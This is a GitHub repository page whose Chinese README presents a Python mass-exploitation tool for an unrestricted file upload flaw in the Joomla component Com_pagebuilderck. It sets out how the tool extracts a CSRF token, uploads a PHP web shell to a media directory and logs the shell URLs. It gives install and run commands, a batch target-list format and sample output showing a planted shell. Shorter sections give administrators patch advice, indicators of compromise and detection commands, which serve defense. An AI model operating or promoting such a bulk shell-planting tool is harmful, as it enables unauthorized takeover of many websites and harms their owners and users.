Jenderal92/CVE-2026-56290

GitHub: Jenderal92/CVE-2026-56290

针对 Joomla Com_pagebuilderck 组件的批量漏洞利用工具,通过无限制文件上传实现远程代码执行。

Stars: 3 | Forks: 0

# CVE-2026-56290 - Com_pagebuilderck 批量漏洞利用 ## ⚠️ 免责声明 ## 📋 描述 **CVE-2026-56290** 是一个针对 **Com_pagebuilderck** Joomla 组件的批量漏洞利用工具。此漏洞允许远程攻击者通过无限制文件上传机制上传任意 PHP 文件,从而导致远程代码执行 (RCE)。 ### 🔍 漏洞详情 | 属性 | 值 | |-----------|-------| | **CVE ID** | CVE-2026-56290 | | **组件** | Com_pagebuilderck | | **平台** | Joomla! CMS | | **类型** | 无限制文件上传 (RCE) | | **CVSS 评分** | 9.8 (严重) | ### 🎯 工作原理 1. **Token 提取**:从目标页面获取 CSRF token 2. **文件上传**:将 PHP shell 上传至 `/media/com_pagebuilderck/gfonts/` 3. **Shell 确认**:通过检查 shell 输出来验证上传是否成功 4. **结果存储**:将易受攻击的 URL 保存到 `reslt.txt` ## 📦 环境要求 ### 系统要求 ``` Python 2.7 pip (Python package installer) ``` Python 依赖项 ``` pip install requests colorama ``` 🔧 安装说明 1. 克隆仓库 ``` git clone https://github.com/Jenderal92/CVE-2026-56290.git cd CVE-2026-56290 ``` 2. 安装依赖项 ``` pip install -r requirements.txt ``` 📖 使用说明 基本用法 ``` python CVE-2026-56290.py targets.txt ``` 输入文件格式 创建一个 targets.txt 文件,每行一个 URL: ``` https://example1.com http://example2.com/joomla https://example3.com:8080 # 注释被忽略 ``` 输出 · 控制台输出:实时进度和结果 · reslt.txt:包含所有存在漏洞的 shell URL 运行示例 ``` $ python CVE-2026-56290.py targets.txt [+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit [+] Threads: 15 [+] Timeout: 10s [+] Output file: reslt.txt [+] Loaded 100 targets from file [*] Starting pool with 15 processes... [1] Queueing: https://example1.com [2] Queueing: https://example2.com ... [1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php ``` ⚙️ 配置 您可以在脚本中修改这些变量: ``` THREADS = 15 # Number of concurrent workers TIMEOUT = 10 # Request timeout in seconds USER_AGENT = "..." # Custom User-Agent string OUTPUT_FILE = "reslt.txt" # Output filename ``` 🛡️ 安全注意事项 致系统管理员 如果您正在运行带有 Com_pagebuilderck 的 Joomla 站点: 1. 立即更新至最新的修补版本 2. 如果不再需要,请移除该组件 3. 监控 `/media/com_pagebuilderck/gfonts/` 目录中是否有可疑文件 4. 实施 WAF 规则以阻止 PHP 文件上传 5. 检查服务器日志以发现漏洞利用企图 入侵指标 (IoC) 请注意以下漏洞利用迹象: ``` # 中的可疑文件 /media/com_pagebuilderck/gfonts/*.php /media/com_pagebuilderck/gfonts/*.phtml /media/com_pagebuilderck/gfonts/*.phar # 可疑请求 /index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1 ``` 检测命令 ``` # 查找 media 目录中的可疑 PHP 文件 find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f # 检查最近的修改 find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7 # 查找可疑文件名(随机字符串) ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)' ``` ⚠️ 法律声明 本软件按“原样”提供,不提供任何形式的保证。作者不对本工具的任何非法或不道德使用负责。在对任何系统进行测试之前,请务必获得适当的授权。 🙏 致谢 · 发现并报告 CVE-2026-56290 的安全研究人员 · 维护该 CMS 的 Joomla 社区 切记:能力越大,责任越大。请在合法和符合道德规范的前提下使用此工具。
标签:CISA项目, Python, 批量EXP, 无后门, 逆向工具